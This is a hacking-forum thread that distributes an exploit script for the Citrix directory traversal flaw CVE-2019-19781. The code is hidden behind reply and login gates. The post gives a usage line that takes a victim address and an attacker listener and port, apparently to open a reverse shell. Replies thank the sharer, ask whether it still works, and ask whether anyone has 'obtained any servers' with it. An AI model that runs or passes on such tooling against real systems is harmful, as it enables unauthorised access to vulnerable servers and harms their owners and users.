Citrix 0day Exploit Leak

[Jay]

DONT LEACH OR I WILL PERSONALLY REPORT YOU

 

 

 

Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
Writeup and mitigation:

Please Login or Register to see this Hidden Content

Forensics and IoC Blog:

Please Login or Register to see this Hidden Content

Usage: python3 citrix0day.py <victimaddress> <victimport> <attacker_listener> <attacker_port>
Also: python3 citrix0day.py -h

 

 

 

 

 

Hidden Content
You'll be able to see the hidden content once you reply to this topic or

Please Login or Register to see this Hidden Content

.

[jose65cordova]

thank you

[SnakePath]

I found exploits for this vul on exploit-db etc, is it from there?

[lojapik385]

Thanks so much

[benwise90]

thanks, mind if i PM you?

[byj75082]

ty so much

[SafariWorld]

thank you mate, nice share

[Catotic]

Is this still working?

[Krypticon2324]

what is this exactly for 

[Riy]

DONT LEACH OR I WILL PERSONALLY REPORT YOU

 

 

 

Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
Writeup and mitigation:

Please Login or Register to see this Hidden Content

Forensics and IoC Blog:

Please Login or Register to see this Hidden Content

Usage: python3 citrix0day.py <victimaddress> <victimport> <attacker_listener> <attacker_port>
Also: python3 citrix0day.py -h

 

 

 

 

 

Hidden Content
You'll be able to see the hidden content once you reply to this topic or

Please Login or Register to see this Hidden Content

.

I had planned to release this when it came out months ago, I had it within 24 hours of it's release. I wrote up a thread for releasing it, but when I attempted to post it captcha'd me and I didn't put the thread on my clipboard so I just decided to say heck it, never bothered releasing it.

Nice to see it finally surfaced though, have you obtained any servers from it personally?